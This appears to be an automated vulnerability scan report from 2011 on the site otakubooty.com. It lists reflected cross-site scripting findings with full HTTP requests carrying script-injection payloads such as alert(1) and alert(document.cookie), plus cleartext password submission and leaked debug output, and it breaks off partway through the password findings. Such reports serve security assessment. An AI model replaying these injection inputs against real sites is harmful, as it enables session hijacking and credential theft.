otakubooty.com, CAPEC-86, XSS, Cross Site Scripting

CAPEC-86: Embedding Script (XSS ) in HTTP Headers

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:00:22 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://otakubooty.com/Default.asp [login parameter]

1.2. http://otakubooty.com/Default.asp [login parameter]

1.3. http://otakubooty.com/Default.asp [name of an arbitrarily supplied request parameter]

1.4. http://otakubooty.com/oa.asp [name of an arbitrarily supplied request parameter]

1.5. http://otakubooty.com/of.asp [name of an arbitrarily supplied request parameter]

1.6. http://otakubooty.com/otaku_help.asp [name of an arbitrarily supplied request parameter]

1.7. http://otakubooty.com/otaku_help.asp [tab parameter]

1.8. http://otakubooty.com/otaku_news.asp [name of an arbitrarily supplied request parameter]

1.9. http://otakubooty.com/otaku_search.asp [name of an arbitrarily supplied request parameter]

1.10. http://otakubooty.com/otaku_signup.asp [name of an arbitrarily supplied request parameter]

2. Cleartext submission of password

2.1. http://otakubooty.com/Default.asp

2.2. http://otakubooty.com/oa.asp

2.3. http://otakubooty.com/oa.asp

2.4. http://otakubooty.com/of.asp

2.5. http://otakubooty.com/otaku_help.asp

2.6. http://otakubooty.com/otaku_news.asp

2.7. http://otakubooty.com/otaku_search.asp

2.8. http://otakubooty.com/otaku_signup.asp

2.9. http://otakubooty.com/otaku_signup.asp

3. Cookie without HttpOnly flag set

4. Password field with autocomplete enabled

4.1. http://otakubooty.com/Default.asp

4.2. http://otakubooty.com/oa.asp

4.3. http://otakubooty.com/oa.asp

4.4. http://otakubooty.com/of.asp

4.5. http://otakubooty.com/otaku_help.asp

4.6. http://otakubooty.com/otaku_news.asp

4.7. http://otakubooty.com/otaku_search.asp

4.8. http://otakubooty.com/otaku_signup.asp

4.9. http://otakubooty.com/otaku_signup.asp

5. Cross-domain Referer leakage

5.1. http://otakubooty.com/Default.asp

5.2. http://otakubooty.com/otaku_help.asp

6. Email addresses disclosed

6.1. http://otakubooty.com/Default.asp

6.2. http://otakubooty.com/oa.asp

6.3. http://otakubooty.com/of.asp

6.4. http://otakubooty.com/otaku_help.asp

6.5. http://otakubooty.com/otaku_news.asp

6.6. http://otakubooty.com/otaku_search.asp

6.7. http://otakubooty.com/otaku_signup.asp

7. Private IP addresses disclosed

8. HTML does not specify charset

8.1. http://otakubooty.com/op.asp

8.2. http://otakubooty.com/show_article.asp

9. Content type incorrectly stated

9.1. http://otakubooty.com/images/articles/5806articlepicture.jpg

9.2. http://otakubooty.com/images/authors/1.jpg

9.3. http://otakubooty.com/op.asp

9.4. http://otakubooty.com/show_article.asp



1. Cross-site scripting (reflected)  next
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://otakubooty.com/Default.asp [login parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The value of the login request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e40"><script>alert(1)</script>e1430befcb2e74bb5 was submitted in the login parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Default.asp?action=login&login=72e40"><script>alert(1)</script>e1430befcb2e74bb5&password= HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp??a5011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E76b5e899461=1
Cache-Control: max-age=0
Origin: http://otakubooty.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; password=; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.2.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 35320


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/Default.asp?action=login&amp;login=72e40"><script>alert(1)</script>e1430befcb2e74bb5&amp;password=&amp;fa=nf">
...[SNIP]...

1.2. http://otakubooty.com/Default.asp [login parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The value of the login request parameter is copied into an HTML comment. The payload 9773a--><script>alert(1)</script>8fb4053a2af was submitted in the login parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Default.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp??a5011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E76b5e899461=1
Cache-Control: max-age=0
Origin: http://otakubooty.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; password=; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.2.10.1297459802
Content-Length: 29

action=login&login=9773a--><script>alert(1)</script>8fb4053a2af&password=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 32284


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] Logging in via form. username=9773a--><script>alert(1)</script>8fb4053a2af -->

<!-- SUPER SECRET DEBUG OUTPUT [ProcessLoginRS] Login result:
...[SNIP]...

1.3. http://otakubooty.com/Default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5011"><script>alert(1)</script>76b5e899461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Default.asp??a5011"><script>alert(1)</script>76b5e899461=1 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=FELOGNJCMJCBMPLBCMMHHOKN; path=/
Vary: Accept-Encoding
Content-Length: 33857


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/Default.asp??a5011"><script>alert(1)</script>76b5e899461=1&amp;fa=nf">
...[SNIP]...

1.4. http://otakubooty.com/oa.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5243f"><script>alert(1)</script>8b6b5d9edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oa.asp?5243f"><script>alert(1)</script>8b6b5d9edb2=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13331
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
<form action="/oa.asp?5243f"><script>alert(1)</script>8b6b5d9edb2=1" method=POST>
...[SNIP]...

1.5. http://otakubooty.com/of.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /of.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1815c"><script>alert(1)</script>41682778012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /of.asp?1815c"><script>alert(1)</script>41682778012=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 37053
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Gen. Ch
...[SNIP]...
<a href="/of.asp?1815c"><script>alert(1)</script>41682778012=1&amp;fa=nf">
...[SNIP]...

1.6. http://otakubooty.com/otaku_help.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a456"><script>alert(1)</script>d7ef83a91a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_help.asp?3a456"><script>alert(1)</script>d7ef83a91a7=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 851287
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="/otaku_help.asp?3a456"><script>alert(1)</script>d7ef83a91a7=1&amp;fa=nf">
...[SNIP]...

1.7. http://otakubooty.com/otaku_help.asp [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ef"><script>alert(1)</script>0f370775ea6 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_help.asp?tab=mailpassword517ef"><script>alert(1)</script>0f370775ea6 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.3.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:30:02 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 851753


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="/otaku_help.asp?tab=mailpassword517ef"><script>alert(1)</script>0f370775ea6&amp;fa=nf">
...[SNIP]...

1.8. http://otakubooty.com/otaku_news.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_news.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ea6"><script>alert(1)</script>6181d9322cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_news.asp?d1ea6"><script>alert(1)</script>6181d9322cf=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34038
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/otaku_news.asp?d1ea6"><script>alert(1)</script>6181d9322cf=1&amp;fa=nf">
...[SNIP]...

1.9. http://otakubooty.com/otaku_search.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_search.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24821"><script>alert(1)</script>ceffb1b07c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_search.asp?24821"><script>alert(1)</script>ceffb1b07c0=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 23480
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Find Me
...[SNIP]...
<a href="/otaku_search.asp?24821"><script>alert(1)</script>ceffb1b07c0=1&amp;fa=nf">
...[SNIP]...

1.10. http://otakubooty.com/otaku_signup.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9a5"><script>alert(1)</script>6c4c802194a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_signup.asp?5b9a5"><script>alert(1)</script>6c4c802194a=1 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 19433


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<a href="/otaku_signup.asp?5b9a5"><script>alert(1)</script>6c4c802194a=1&amp;fa=nf">
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 9 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://otakubooty.com/Default.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Default.asp? HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=NDLOGNJCDHMPLHFJEKFDNPNP; path=/
Vary: Accept-Encoding
Content-Length: 31846


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

2.2. http://otakubooty.com/oa.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /oa.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11311
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
</p>
   
   <form action="/oa.asp?" method=POST>
   <input TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<BR>
       <input name="password" type=password size=15 maxlength=25>
   </p>
...[SNIP]...

2.3. http://otakubooty.com/oa.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /oa.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11311
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

2.4. http://otakubooty.com/of.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /of.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /of.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35078
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Gen. Ch
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

2.5. http://otakubooty.com/otaku_help.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /otaku_help.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
